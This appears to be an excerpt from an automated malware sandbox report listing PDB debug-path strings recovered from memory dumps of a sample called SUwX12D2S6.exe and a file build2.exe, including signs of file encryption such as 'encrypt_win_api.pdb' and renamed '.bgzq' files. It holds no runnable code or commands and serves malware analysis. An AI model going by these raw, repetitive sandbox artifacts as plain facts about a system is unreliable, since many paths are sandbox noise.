Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\3c source: SUwX12D2S6.exe, 00000004.00000003.2158068491.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156495174.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2158347421.0000000003576000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174316337.000000000359D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2169782007.0000000003596000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2159372299.0000000003596000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\Z source: SUwX12D2S6.exe, 00000004.00000003.2210867698.0000000003743000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2218755081.000000000374A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217347390.000000000374A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\8bbwe\App source: SUwX12D2S6.exe, 00000004.00000003.2237119019.0000000003514000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2239471258.00000000034EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881875981.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881957469.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110134134.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2111097747.0000000003405000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2202322208.0000000003189000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2211528266.000000000318D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2211213412.000000000318A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2201372327.0000000003184000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2203425081.0000000003191000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: SUwX12D2S6.exe, 00000004.00000003.2135736768.0000000003479000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135411368.000000000340B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: SUwX12D2S6.exe, 00000004.00000003.2157081568.0000000003462000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156718696.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2157423104.0000000003476000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbN source: SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2183331491.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202393003.000000000376B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\S5 source: SUwX12D2S6.exe, 00000004.00000003.2232069068.0000000003579000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2184874668.0000000003416000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2184048113.0000000003413000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*YW: source: SUwX12D2S6.exe, 00000004.00000003.2209514089.0000000003811000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2215986355.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217021524.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231922111.000000000383E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2211005248.0000000003817000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorzq source: SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2174356824.00000000037A2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2183331491.00000000037A2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2185146314.00000000037A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\-a source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ta\\\(* source: SUwX12D2S6.exe, 00000004.00000003.2232069068.0000000003579000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.bgzqgn source: SUwX12D2S6.exe, 00000004.00000003.2110681040.00000000034F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\che\C source: SUwX12D2S6.exe, 00000004.00000003.2208481995.000000000375B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\: source: SUwX12D2S6.exe, 00000004.00000003.2158968195.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156658910.00000000033B6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2169889587.00000000033C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2209514089.0000000003811000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2210867698.0000000003743000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2218755081.000000000374A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2215986355.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217021524.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231922111.000000000383E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217347390.000000000374A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2211005248.0000000003817000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\15 source: SUwX12D2S6.exe, 00000004.00000003.2209514089.000000000380B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202393003.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202710386.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2203093794.00000000037E3000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2208481995.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2208818329.00000000037CB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000007.00000002.1785156949.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000007.00000000.1781524100.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000000.1783808645.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: SUwX12D2S6.exe, 00000004.00000003.2233587760.000000000394F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233015637.000000000390F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231618846.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\=V source: SUwX12D2S6.exe, 00000004.00000003.2174162610.00000000033B1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\;Sy4N source: SUwX12D2S6.exe, 00000004.00000003.2217897189.00000000038AB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216202881.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217675191.00000000038A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\cl source: SUwX12D2S6.exe, 00000004.00000003.2110134134.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2111097747.0000000003405000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226563641.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2158068491.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156495174.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2158347421.0000000003576000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2174316337.000000000359D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2169782007.0000000003596000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136368733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2159372299.0000000003596000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbhe.txt.bgzqxt source: SUwX12D2S6.exe, 00000004.00000003.2109828995.0000000003479000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110380294.000000000348D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\w\y source: SUwX12D2S6.exe, 00000004.00000003.2236436289.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231618846.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2202393003.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202710386.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2203093794.00000000037E3000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2183331491.00000000037A2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2185146314.00000000037A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorONTENT_TASKBARHEADLINES.jsontxt source: SUwX12D2S6.exe, 00000004.00000003.2109828995.0000000003479000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2110380294.000000000348D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\*Bi source: SUwX12D2S6.exe, 00000004.00000003.2226723722.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881875981.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2184121684.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2225540969.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2201804626.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2170520541.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000002.2246470832.00000000033D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\r\\b. source: SUwX12D2S6.exe, 00000004.00000003.2231998014.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226563641.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233139919.000000000387B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2232892838.000000000386A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231922111.000000000383E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2231998014.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226563641.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233139919.000000000387B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2232892838.000000000386A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231922111.000000000383E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: SUwX12D2S6.exe, 00000004.00000003.2209514089.0000000003811000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217897189.00000000038AB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2216202881.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2208481995.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217675191.00000000038A9000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2211005248.0000000003817000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2223567308.000000000376A000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2226563641.0000000003853000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2215986355.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2217021524.000000000381E000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2223984909.000000000382F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: SUwX12D2S6.exe, SUwX12D2S6.exe, 00000004.00000002.2243904603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000005.00000002.1719252737.0000000005E60000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000006.00000002.4129272399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000B.00000002.1848123271.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000C.00000002.1864325643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000017.00000002.2105470149.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000018.00000002.2116911139.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\m source: SUwX12D2S6.exe, 00000004.00000003.2158068491.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2156495174.000000000353F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2158347421.0000000003576000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136368733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2159372299.0000000003596000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\dat.bgzb8 source: SUwX12D2S6.exe, 00000004.00000003.2209514089.000000000380B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202393003.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2202710386.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2203093794.00000000037E3000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2208481995.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2208818329.00000000037CB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\** source: SUwX12D2S6.exe, 00000004.00000003.2135736768.0000000003479000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135411368.000000000340B000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2135310569.0000000003493000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136261874.000000000350D000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2136368733.0000000003534000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2135016253.00000000033F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\WinX\d.pdb source: SUwX12D2S6.exe, 00000004.00000003.2242116659.000000000375B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SUwX12D2S6.exe, 00000004.00000003.1785234660.00000000097F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: SUwX12D2S6.exe, 00000000.00000002.1676946978.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000001.00000002.1694613073.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000003.00000002.1701674378.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000002.2243904603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000005.00000002.1719252737.0000000005E60000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000006.00000002.4129272399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000B.00000002.1848123271.0000000005E70000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 0000000C.00000002.1864325643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000017.00000002.2105470149.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000018.00000002.2116911139.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: SUwX12D2S6.exe, 00000004.00000003.2233587760.000000000394F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2233015637.000000000390F000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2231618846.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: SUwX12D2S6.exe, 00000004.00000003.2174356824.00000000037A2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2183331491.00000000037A2000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.2185146314.00000000037A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\.log, source: SUwX12D2S6.exe, 00000004.00000003.1881875981.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, SUwX12D2S6.exe, 00000004.00000003.1881957469.00000000033DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzq source: SUwX12D2S6.exe, 00000004.00000003.2109828995.0000000003479000.00000004.00000020.00020000.00000000.sdmp
